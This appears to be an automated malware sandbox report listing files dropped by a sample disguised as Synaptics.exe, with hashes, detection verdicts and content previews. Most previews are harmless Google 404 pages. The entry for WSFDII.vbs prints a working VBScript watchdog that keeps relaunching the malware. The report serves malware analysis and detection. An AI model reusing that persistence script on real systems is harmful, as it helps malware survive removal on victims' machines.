Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7SZpiBAMjbPXp1tC_llnXg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\WEkAbyt.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.254311362839109
Encrypted:	false
SSDEEP:	24:GgsF+0kcSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Nc+pAZewRDK4mW
MD5:	BCCE80F4CB824DDB2186E0CD0ACE0EE1
SHA1:	070532075819463364B6CD326E2F1EE7E5794E0E
SHA-256:	A346574817CA956F8638452F9CD88240F76A86B8AFCD7D2D539070C73D5BADFA
SHA-512:	64CC2500E3401A9FD47D6133B5E32A00FFFCCF6258D73271B16251D02E6DD4371D61AADA58C1AA3205D67344DD81EE7DC9BD63D0A21FC6EEBFADFE975827B1F2
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vtmHOpseNkUyn9paCMw4kQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\WSFDII.vbs

Download File

Process:	C:\Users\user\Desktop\._cache_KOGJZW.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	836
Entropy (8bit):	5.380115217913285
Encrypted:	false
SSDEEP:	24:dF/UFXuvU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFrt+G+7xLxe0WABNVIqZaVzgA
MD5:	09BB587F90EC6872F81880A2D8E1908B
SHA1:	2BAE2D8E4881811B3279FC34F2CF646B0F9EBEDB
SHA-256:	89BB17E9F362728B86714B62CFA0F22CC26B56AA8081831D048BB2A12484249A
SHA-512:	D14B520A3183E831393FAD66FC38D1E6629AA18C72245FE5BA22D2C4B29391ACC83366E83E86AD281232BA4F88AF934FE972EA188A06EE0C9BBCF18DC7DECD4C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\WSFDII.vbs, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_KOGJZW.exe"..fileset = """C:\Users\user\Desktop\._cache_KOGJZW.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

C:\Users\user\AppData\Local\Temp\WrgUOBr.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.271522836109407
Encrypted:	false
SSDEEP:	24:GgsF+0vSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
MD5:	8D22EC4F44E495244829CBAAEE6FA19B
SHA1:	D30AB20149E1602AB0E05DDBBDAF14961CA888D1
SHA-256:	E7B1BDFA392F7F5301CAFA696D99BEC19CCB94EDA633785F351DFD980BC6329D
SHA-512:	BBA9B150587C5703E32D823669F6B478AB1FBD185E2BFFD4AED8AC977845D1AB84238E403C83280354F21E4DF1A02806B292DB1B570446C28C662C98FCBD7671
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WCA9BB6Htdzw3rzBXG3orQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\Xw6nwy9.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.250723880814006
Encrypted:	false
SSDEEP:	24:GgsF+0XXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+4+pAZewRDK4mW
MD5:	65F45CCA23EFFFD0DD0A6F2B75DDBE99
SHA1:	154EF31FDFF7FB34EAF9763C90AA1D8DEF2A2A99
SHA-256:	23EC49DE7E9BA8B56F4EA46DB941EDFB3260F2C544218A5B41B3EF453D1B439A
SHA-512:	9D7E935424464AA9FD9A174609D0F8145E8565957EECB9FFAD2DDA0F855D1C0B488D222F997933B1C587CF5E8B1FDAC41031E126CFA727188B0490C9C6516E5B
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="pSl-posXkuCMGPN_Qllcog">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\YoWFBuU.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.2461928957087265
Encrypted:	false
SSDEEP:	24:GgsF+0+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Z+pAZewRDK4mW
MD5:	159952A3A55EE8E5908BCB28FA711117
SHA1:	9DEEFD39382E33C0025C038586009EAF1284B31B
SHA-256:	544B7DFE4D38E883102B41A1F85CBE13CA0644E77759B99D5A6933FD76C8AC3F
SHA-512:	B9B1A2648BE5A7F6DE1318D6F7759167578581F21C9ECCD084B5A91E1EE37CBCD6CF6F29DB497A0D71278A5848CE8058EE70D7279E78B6CE283BA9AA383630DD
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ki-Aaa30I1myZImt6o6_eg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\Z7tsURC.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.263474538257065
Encrypted:	false
SSDEEP:	24:GgsF+09/XSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+2+pAZewRDK4mW
MD5:	5998BEDB1CC5A5A599CF382EB546A1E9
SHA1:	1762BA64B42D9E1F6B55A66363432E7182F2669C
SHA-256:	5965640FCF5C9F78F86544508808102BE6D505FC9BD3CD89902CFC6495B456DC
SHA-512:	19BB1D5127132D5577D8891E20BC67FD3D408B6FB5EFAFE4CD71B811ECD568E97836B6AB59B8BD88D303F20AF79E9A5E0D5E089D4B2EC537F1024714BE61DAB1
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8u7BtmqkF_PC_0LD1mQ6pw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\buLhfHT.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.27470765479371
Encrypted:	false
SSDEEP:	24:GgsF+07arXSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+xrX+pAZewRDK4mW
MD5:	7F7F4C851591199000CAB93353467A2D
SHA1:	D819A129FD1FA41A3D3613E57C105A37D491537A
SHA-256:	8AA3735D2A6F9E58D4AE9278792D807C6E448259B0918EE67017FFB89E2F1DE6
SHA-512:	FD93B6611FA7AF0FB3EBEEF5E2DF14A447D2E0115C39D15C82C6908ACC2D1C3127DEDC541AD348F40BC9A3EC5693134A7E8A5805BF7300168D7DA64CD8E1C296
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oxxCI2YOtjJBSmzIqcfMOQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\c8eEUXO.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.267196003089753
Encrypted:	false
SSDEEP:	24:GgsF+0jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+A+pAZewRDK4mW
MD5:	B9B85AC053310C27AFF6B6942C4A70F7
SHA1:	4710814D7B1BC514A692FF2DFB761515F0402606
SHA-256:	9FA0AFC5F7DEBA419C148CAEC2BBD69D33659CCF8DFF3DBF89EDAF59DA739441
SHA-512:	27F4A894A3669EBE423187893112CE47DC81996A2198BF5659A5353F77A670FDB01005761E91FC1DAB4B93C3A16BB3975EF273003C9F17213CDBEA73668D4428
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j0_AX_1TSSaK80I29smKbQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\ekJbHr3.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.267509353497618
Encrypted:	false
SSDEEP:	24:GgsF+0TSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Y+pAZewRDK4mW
MD5:	21BC52B3520E329B801071F65FE91E8F
SHA1:	014A35B8BA3B97E688BE57AD2EA88AA55E5D922B
SHA-256:	3AAFA8ED03082F4D87D94156DBF7612A44FE71DC9D6C1BBE2356E0895BCF35BF
SHA-512:	2F636D7BB2AD77532BE2D69FD52848F0A82346B04454D87F98EFDD3AB8781C6AE2393DCB3CAC2B4867CAF861F62EC38582328B9C063F4AB32FF089C99D43E7B3
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="D36Q7Bs1xc07Fe7eBP3ICQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\ekvXZxW.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.267579100696862
Encrypted:	false
SSDEEP:	24:GgsF+0Ym7SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Vm7+pAZewRDK4mW
MD5:	255CAFCBFE0974A9A2E04264DEB1BB89
SHA1:	94E2C33AC2C7BA37CD72F1B253A6B5A2EA7DA3A9
SHA-256:	DA92E9BC80E51B333020C2DFB73B7779E91A9F21ABEAE2F224ABDBA41DBD5831
SHA-512:	E27EBDAE958A465A84A9E6C68D069A9E9C97D5AE4731C3E7FE25B2BF33EE6D453F1E6611184CA06A13842A23DFCAF8CC3326FAC9ED265B82936637279723EA44
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GHBT5Els5g6E3UWw6rA67A">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\l89Z5Ui.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.263203044166205
Encrypted:	false
SSDEEP:	24:GgsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+i+pAZewRDK4mW
MD5:	BB028A2E9D23C325EBDF55D22BAC8B09
SHA1:	880A74D01BACCD84BBA34CD2E56D228C4077249B
SHA-256:	F19535B0275A183D1BF0AEF8CFA9082C0D8975879F643F86BE316F61CD4A343C
SHA-512:	6C3D3E7121EE320493E88B109FC1EE455CAA18512E95FD4B35F91AA7A3FE34E91C94B4C5C2FE8FACDD929509D9D7CB19CD0BF7531AE66EE1A52A1D2B0C76F03B
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9dP5I5QMQqgq5o9gtOLdBQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\l8G3M3Tz.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\AppData\Local\Temp\lGTqhTw.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.262987817278386
Encrypted:	false
SSDEEP:	24:GgsF+0WISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+DI+pAZewRDK4mW
MD5:	F916B936E55A63906209ABCF29A42839
SHA1:	95F7AD2466374D1749F54C1CA6D7DCEC8416F07D
SHA-256:	FF03B752C08F8420A2F3888D28193AB3DBFF0F782A9480A20600BD765DE2A435
SHA-512:	2B3267822CD23241A45AB2861FC40D2A273CFBEFD62E6EEB4B6174240DE053BFDAED8584AFC8150C1FC4920E3ACFBDF520A52822756688BA276347DBACBCE3C8
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="I4--jzHitBZcrgUjY4BviQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\mGdTlcv.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.2760406854450315
Encrypted:	false
SSDEEP:	24:GgsF+0YxSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+x+pAZewRDK4mW
MD5:	2500AE7F7526CCD8ADF9E6A017C6ED21
SHA1:	5ECD1CECB63176088A3DE995CA5D37E7903402C8
SHA-256:	C1BDC40600BF803553871BC2DEB54A8620B319B3595742F6CCA05DE286E3C3DC
SHA-512:	BE231206E1B7360C6B031E8416E8BA09AD83D4A362B1FBDFAB4C0AEF313B7B187FBB42A52DD25DDE302EAAF6A827B9E19188FA367E18E4D1156AF287AD8B81C3
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zDVQ4MAUKB4NvqxIGAfpsg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\mzc8ehx.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.260166838053492
Encrypted:	false
SSDEEP:	24:GgsF+0HUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+cU+pAZewRDK4mW
MD5:	66F261597FB7803EB12A8FD1848665A8
SHA1:	F055C90AB5C25F5270835325B5233E709AB223B8
SHA-256:	2691B0125003FF29C0764650AE00733C12A5860E0E9A129DDF1DDF12BE7A6FFD
SHA-512:	CCBB552D66589929C2E929F2D7DC3CED18DB764595BC516D1807338A9FFAB3195D738438A5C4E799AA574008EFE3C6245C9F030BD241A23EB900FA28243E103C
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XxptE2OeArhtKjjq-q6bFw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\nTkIOi8.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.259083464340792
Encrypted:	false
SSDEEP:	24:GgsF+0uvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
MD5:	50B82BBBA1E54CE86A1E34EF6CE8DCAB
SHA1:	DA47347A5F2CD947D58C1476B1C746BE3D0EFA8B
SHA-256:	EB7F88A187B9018BAC6F42C77C064DAAF4F10CBEF6B57D4BB362F11BABCCA7AB
SHA-512:	9780F9421E9ADDEA94AF5329766E8D5D153AC68027AC06644C37C7F99FE4FDB074FD8C51E91ABBD6F859CF4A32816A7934EC4FFC5DF265734E0380E607D5D9B6
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="i5sCkk2j3vSknIntNULPUg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and 